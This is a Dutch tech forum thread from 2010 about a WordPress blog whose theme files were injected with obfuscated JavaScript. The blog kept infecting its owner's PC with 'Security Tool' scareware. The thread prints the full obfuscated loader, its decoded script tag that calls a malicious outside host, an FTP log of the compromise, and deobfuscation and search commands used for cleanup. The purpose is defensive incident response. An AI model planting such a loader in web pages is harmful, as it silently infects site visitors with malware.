Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien
Toon posts:

"Security Tool Virus" blijft terug komen

Pagina: 1
Acties:

zaterdag 21 augustus 2010 11:22

Acties:
  • roy-t
  • Registratie: Oktober 2004
  • Laatst online: 17-10 16:43

roy-t

Topicstarter
Hey allemaal,

Ik heb last van het volgende virus: http://www.techjaws.com/how-to-remove-security-tool-virus/.

Terwijl ik gewoon aan het serven ben (op dat moment op twitter, tweakers.net en mijn eigen blog) krijg ik van UAC de vraag of program 904123Afa24.exe uitgevoerd mag worden. Natuurlijk zeg ik nee. Helaas is er 2 seconden later toch het bovenstaande virus geinstalleerd (met nog een paar broertjes). Balen, het is super agressief, je kunt geen enkel process/programma meer starten dat niet al gestart was.

Microsoft Security Essentials stond nog aan en die heb ik een quick scan laten doen, niets te vinden. N.a.v. de link boven heb ik in veilige modus Malwarebytes gedownload, die vond alles wel. Ook heb ik zelf nog even naar mijn AppData folder gekeken en met msconfig, HijackThis en Autoruns ervoor gezorgt dat er echt niets gek meer zomaar opstarten.

De rest van de avond heb ik MSE en Malwarebytes een volledige scan laten doen, MSE vond niets en Malwarebytes vond nog een paar kleine dingetjes.

So far so good.


Echter nu log ik deze ochtend in en ik start Opera weer, check mijn blog, twitter en tweakers.net et voila het zelfde gebeurt weer. :/.

Hoe kan ik ervoor zorgen dat het gat waardoor dit virus telkens naar binnen komt wordt gedicht? MSE is volledige geupdate UAC staat aan en de Windows Firewall ook.

~ Mijn prog blog!

zaterdag 21 augustus 2010 11:27

Acties:
  • mklcln
  • Registratie: December 2004
  • Nu online

mklcln

Je kan ook nog eens aantal anti-virus rescue cds gebruiken (Bitdefender, G-Data etc.)
Overigens is er een site waar je meerdere rescue cds kunt maken op 1 iso of op usb:
http://www.sarducd.it/ die ik regelmatig gebruik.
Dan staat windows tenminste niks uit te voeren.

Maar meestal moet malwarebytes dit toch wel kunnen verwijderen...

[ Voor 19% gewijzigd door mklcln op 21-08-2010 11:29 ]

zaterdag 21 augustus 2010 11:32

Acties:
  • Mavamaarten
  • Registratie: September 2009
  • Laatst online: 01:04

Mavamaarten

Omdat het kan!

Alles opnieuw cleanen, en daarna chache en tijdelijke internetbestanden van opera wissen.

Android developer & dürüm-liefhebber

zaterdag 21 augustus 2010 11:32

Acties:
  • Turdie
  • Registratie: Maart 2006
  • Laatst online: 20-08-2024

Turdie

Misschien keer met een andere virusscanner scannen dan MSE, bijvoorbeeld Symantec of F-Secure?

zaterdag 21 augustus 2010 11:33

Acties:
  • Bjk
  • Registratie: Augustus 2002
  • Laatst online: 09:20

Bjk

Daarnaast is volgens mij jouw blog ge inject met dit virus. Wanneer ik de bron bekijk zie ik allerlei verontrustende javascript code. Ik zou dit eerst verwijderen voordat je weer je eigen blog bezoekt. Nu besmet jouw blog ook andere gebruikers.

zaterdag 21 augustus 2010 11:34

Acties:
  • Suicyder
  • Registratie: Mei 2002
  • Laatst online: 12:52

Suicyder

Ik gebruik in dit soort gevallen meestal spybot en malwarebytes beiden, ze hebben beiden dingen die ze niet zien/verwijderen. Zorg daarnaast dat er een virusscanner actief draait. Virusscanners komen vaak niet in de 'System Volume Information' folder waar MalwareBytes dat wel doet en zodra MWB het opent scant de virusscanner het ook.

Daarnaast is het verstandig je temp folders te legen. Run desnoods CCleaner als je niet alle temp folders weet te vinden. Reset je browser en leeg al zijn caches.
En controleer je blog ook!

Dat alles helpt meestal.

edit:
Zoals gezegd, je blog bevat inderdaad allerlei gare code, het beste is dat zo spoedig mogelijk te verwijderen gezien andere gebruikers er mogelijk door geinfecteerd worden. Daarnaast controleren waardoor het heeft kunnen gebeuren dat je blog infected is geraakt.

[ Voor 21% gewijzigd door Suicyder op 21-08-2010 11:36 ]

zaterdag 21 augustus 2010 11:39

Acties:
  • roy-t
  • Registratie: Oktober 2004
  • Laatst online: 17-10 16:43

roy-t

Topicstarter
Bjk schreef op zaterdag 21 augustus 2010 @ 11:33:
Daarnaast is volgens mij jouw blog ge inject met dit virus. Wanneer ik de bron bekijk zie ik allerlei verontrustende javascript code. Ik zou dit eerst verwijderen voordat je weer je eigen blog bezoekt. Nu besmet jouw blog ook andere gebruikers.
Hier heb ik net ook naar gekeken omdat ik telkens mijn eigen blog open had. Ik heb net mijn blog geupdate naar de nieuwste release van wordpress.

Dit heeft het niet beter gemaakt. Als ik naar individuele pagina's browse dan werkt het gewoon goed, maar als ik naar de hoofdpagina ga dan zie ik niets, alleen deze code:

JavaScript:
1

<script type="text/javascript">var m5uDuBbOb="vFE6R20vFE6R30";var HdWQi5x2e0="vFE6R3cvFE6R73vFE6R63vFE6"; var HdWQi5x2e1="R72vFE6R69vFE6R70vFE6R74v"; var HdWQi5x2e2="FE6R20vFE6R74vFE6R79vFE6R"; var HdWQi5x2e3="70vFE6R65vFE6R3dvFE6R22vF"; var HdWQi5x2e4="E6R74vFE6R65vFE6R78vFE6R7"; var HdWQi5x2e5="4vFE6R2fvFE6R6avFE6R61vFE"; var HdWQi5x2e6="6R76vFE6R61vFE6R73vFE6R63"; var HdWQi5x2e7="vFE6R72vFE6R69vFE6R70vFE6"; var HdWQi5x2e8="R74vFE6R22vFE6R20vFE6R73v"; var HdWQi5x2e9="FE6R72vFE6R63vFE6R3dvFE6R"; var HdWQi5x2e10="22vFE6R68vFE6R74vFE6R74vF"; var HdWQi5x2e11="E6R70vFE6R3avFE6R2fvFE6R2"; var HdWQi5x2e12="fvFE6R39vFE6R6evFE6R73vFE"; var HdWQi5x2e13="6R74vFE6R74vFE6R2evFE6R73"; var HdWQi5x2e14="vFE6R65vFE6R72vFE6R76vFE6"; var HdWQi5x2e15="R65vFE6R69vFE6R72vFE6R63v"; var HdWQi5x2e16="FE6R2evFE6R63vFE6R6fvFE6R"; var HdWQi5x2e17="6dvFE6R2fvFE6R2fvFE6R6dvF"; var HdWQi5x2e18="E6R6cvFE6R2evFE6R70vFE6R6"; var HdWQi5x2e19="8vFE6R70vFE6R22vFE6R3evFE"; var HdWQi5x2e20="6R20vFE6R3cvFE6R2fvFE6R73"; var HdWQi5x2e21="vFE6R63vFE6R72vFE6R69vFE6"; var HdWQi5x2e22="R70vFE6R74vFE6R3e"; var lOu3VFt21="sfeKM20vFE6R30";var VkWs063YP=HdWQi5x2e0+HdWQi5x2e1+HdWQi5x2e2+HdWQi5x2e3+HdWQi5x2e4+HdWQi5x2e5+HdWQi5x2e6+HdWQi5x2e7+HdWQi5x2e8+HdWQi5x2e9+HdWQi5x2e10+HdWQi5x2e11+HdWQi5x2e12+HdWQi5x2e13+HdWQi5x2e14+HdWQi5x2e15+HdWQi5x2e16+HdWQi5x2e17+HdWQi5x2e18+HdWQi5x2e19+HdWQi5x2e20+HdWQi5x2e21+HdWQi5x2e22; LxZEYkraL=VkWs063YP.replace(/vFE6R/g,"%");var rk1EtekJM=unescape;var m5uDuBbOb="MwcxE20sfeKM30";q9124=this;var FHOUQ91II=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];FHOUQ91II.write(rk1EtekJM(LxZEYkraL));</script>


Dat is zeker niet iets van wordpress, maar hoe krijg ik dit weg?

~ Mijn prog blog!

zaterdag 21 augustus 2010 11:46

Acties:
  • EnnaN
  • Registratie: September 2002
  • Laatst online: 28-11 09:53

EnnaN

Toys in the attic

Hoeveel moeite is het om een nieuwe install te doen van wordpress? (als in: hoeveel veranderingen heb je zelf gedaan?)
Anders zou ik daar mee beginnen (ff op testserver), nieuwste versie.
Daarna je database terugzetten, maar die moet je vast ook goed bekijken op enge code... Weet google niet iets over dit script?

sig

zaterdag 21 augustus 2010 11:53

Acties:
  • roy-t
  • Registratie: Oktober 2004
  • Laatst online: 17-10 16:43

roy-t

Topicstarter
EnnaN schreef op zaterdag 21 augustus 2010 @ 11:46:
Hoeveel moeite is het om een nieuwe install te doen van wordpress? (als in: hoeveel veranderingen heb je zelf gedaan?)
Anders zou ik daar mee beginnen (ff op testserver), nieuwste versie.
Daarna je database terugzetten, maar die moet je vast ook goed bekijken op enge code... Weet google niet iets over dit script?
Het lijkt random gegenereed dus ik kan zo niets vinden in Google. Het duurt ongeveer een uur om alles weer goed te krijgen denk ik. Nog even een kwartiertje google en dan gaan we maar even alles opnieuw installeren.

Edit: het zit zo te zien in index.php van de theme files. Kijken of het weg gaat als ik alleen de themes opnieuw installeer (gelukkig had ik daar een backup van).

[ Voor 11% gewijzigd door roy-t op 21-08-2010 11:59 ]

~ Mijn prog blog!

zaterdag 21 augustus 2010 11:57

Acties:
  • frickY
  • Registratie: Juli 2001
  • Laatst online: 27-11 09:24

frickY

roy-t schreef op zaterdag 21 augustus 2010 @ 11:22:
met msconfig, HijackThis en Autoruns ervoor gezorgt dat er echt niets gek meer zomaar opstarten.
Automatisch is niet de enige manier hoe trojans worden gestart. Ze willen ook wel eens een extensie kapen, zoals .exe.
Elke keer dat je een .exe start wordt dan eerst de trojan opgestart en vervolgens de exe zelf zodat het niet opvalt.

In je register moet HKEY_CLASSES_ROOT\.exe een (Default) value exefile hebben.
HKEY_CLASSES_ROOT\exefile\shell\open\command moet op zijn beurt een (Default) hebben van "%1" %*
Als hij gekaapt is staat hier het pad naar de trojan.

Het kan ook een willekeurig ander bestandstype zijn, maar in mijn ervaring wordt meestal de exe gepakt. Als je weet waar het virus zelf staat is het makkelijker om gewoon op die bestandsnaam te zoeken.

[ Voor 3% gewijzigd door frickY op 21-08-2010 11:59 ]

zaterdag 21 augustus 2010 12:04

Acties:
  • roy-t
  • Registratie: Oktober 2004
  • Laatst online: 17-10 16:43

roy-t

Topicstarter
frickY: goede tip, zal ik zeker even naar kijken.

Zo, ik heb gevonden waar het de evil javscript zich had verstopt, in de thema bestanden, ze waren allemaal geinfecteerd dus ik heb alle themes gewiped en een backup daarvan terug gezet. Dat scheelt toch weer een hoop werk.

In het Google dashboard zit ook een malware optie en daarmee heb ik even gekeken waar het volgens Google zou moeten zitten, op die twee paginas die Google had gevonden zit het nu in ieder geval niet meer, ook de voorpagina e.d. laden weer normaal.

Wel ontzettend shit dat ik geinfecteert ben door mijn eigen blog... Wordpress is iig weer helemaal up to date.

~ Mijn prog blog!

zaterdag 21 augustus 2010 12:13

Acties:
  • eghie
  • Registratie: Februari 2002
  • Niet online

eghie

Spoken words!

roy-t.nl die had er inderdaad last van. Ik heb hem ookvanochtend van een klant zijn website moeten afhalen. Ik heb precies dezelfde code eraf moeten halen van die site. Hoezo toeval?

Wat er uiteindelijk was gebeurd, die klant zijn FTP gegevens waren gejat. Door een chinees ip/gebruiker gejat en vervolgens via een chinese PC via FTP die code erin gezet, net tegen de body tag aan. Alleen bij alle index.html, index.php, default.php, maar de andere bestanden met rust gelaten.

Dit was mijn FTP log:
xx.xx.xx.xx UNKNOWN ftpgebruiker [20/Aug/2010:20:02:07 +0200] "RETR /domein-webroot/private_html/index.html" 226 212
xx.xx.xx.xx UNKNOWN ftpgebruiker [20/Aug/2010:20:02:08 +0200] "STOR /domein-webroot/private_html/index.html" 226 1969
xx.xx.xx.xx UNKNOWN ftpgebruiker [20/Aug/2010:20:02:09 +0200] "RETR /domein-webroot/public_html/default.php" 226 1553
xx.xx.xx.xx UNKNOWN ftpgebruiker [20/Aug/2010:20:02:10 +0200] "STOR /domein-webroot/public_html/default.php" 226 3260
xx.xx.xx.xx UNKNOWN ftpgebruiker [20/Aug/2010:20:02:11 +0200] "RETR /domein-webroot/public_html/index.php" 226 5872
xx.xx.xx.xx UNKNOWN ftpgebruiker [20/Aug/2010:20:02:13 +0200] "STOR /domein-webroot/public_html/index.php" 226 7629
xx.xx.xx.xx UNKNOWN ftpgebruiker [20/Aug/2010:20:02:24 +0200] "RETR /domein-webroot/stats/index.html" 226 4957
xx.xx.xx.xx UNKNOWN ftpgebruiker [20/Aug/2010:20:02:25 +0200] "STOR /domein-webroot/stats/index.html" 550 -
xx.xx.xx.xx UNKNOWN ftpgebruiker [20/Aug/2010:20:02:26 +0200] "STOR /domein-webroot/stats/index.html" 550 -


Dit was het report wat Google had over die website: http://safebrowsing.clien...fded.serveirc.com//ml.php

Die javascript code geeft terug:
JavaScript:
1

<script type="text/javascript" src="http://9nstt.serveirc.com//ml.php"> </script>


Dus tip, verander je FTP login en kijk eens in je FTP logs. En scan eens met hitman pro op je PC.


Als je trouwens zelf wil weten wat geobfusceerde javascript code doet. Dit kan als volgt:

De geobfuscate javascript code zou je kunnen debuggen met Spidermonkey.

Als je dat zou willen doe op ubuntu/debian het volgende:
aptitude install spidermonkey-bin



Maak een bootstrap.js aan, met de volgende inhoud:

JavaScript:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

replace_script = function(arg0) {
re = new RegExp(/<\/?script[^>]*>/gi);

return arg0.replace(re, '');
}

old_eval = eval;
eval = function(arg0) {
print("eval arg: " + arg0);

try {
old_eval(replace_script(arg0));
} catch (err) {}
}

document = {
write: function(arg0) {
eval(arg0);
print(replace_script(arg0));
},
writeln: function(arg0) {
eval(arg0);
print(arg0 + "\n");
}
}


stop de obfuscated code in obfuscated.js.

Om dan de code vervolgens te debuggen, gebruik het volgende commando:
js -f bootstrap.js obfuscated.js



Zo zou je de obfuscated javascript code mogelijk kunnen ontrafelen.

Je zou vervolgens bootstrap.js kunnen aanpassen om verdere info te filteren.


Deze website kan dat trouwens ook: http://jsunpack.jeek.org/dec/go


Als je shell toegang hebt op je domein en je hebt linux, is dit wel handig om die code te zoeken: (die Y12WIG kwam ook in mijn code voor namelijk)
fgrep -Ri "Y12WlG" /documentroot | less


of:
fgrep -Ri '<script type="text/javascipt">' /documentroot | grep -i body | less

[ Voor 5% gewijzigd door eghie op 21-08-2010 12:41 ]

zaterdag 21 augustus 2010 12:14

Acties:
  • CH4OS
  • Registratie: April 2002
  • Niet online

CH4OS

It's a kind of magic

roy-t schreef op zaterdag 21 augustus 2010 @ 12:04:
Zo, ik heb gevonden waar het de evil javscript zich had verstopt, in de thema bestanden, ze waren allemaal geinfecteerd dus ik heb alle themes gewiped en een backup daarvan terug gezet. Dat scheelt toch weer een hoop werk.
Daar moeten zulke files sowieso komen, anders 'verschijnt' het niet op je blog... :)
In het Google dashboard zit ook een malware optie en daarmee heb ik even gekeken waar het volgens Google zou moeten zitten, op die twee paginas die Google had gevonden zit het nu in ieder geval niet meer, ook de voorpagina e.d. laden weer normaal.
Probeer elke pagina te doorlopen, met name in de bestanden in de themes map, wellicht dat er nog meer geïnfecteerd zijn.
Wel ontzettend shit dat ik geinfecteert ben door mijn eigen blog... Wordpress is iig weer helemaal up to date.
Erg vervelend inderdaad, heb het zelf gelukkig nog nooit meegemaakt met WP. Als tip wil ik je wel meegeven, om de machtigingen op iig de themes folder aan te passen, zodat deze publiekelijk alléén te lezen is (ik geloof dat dat 755 is, niet zeker meer).
Pagina: 1
Reageer

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq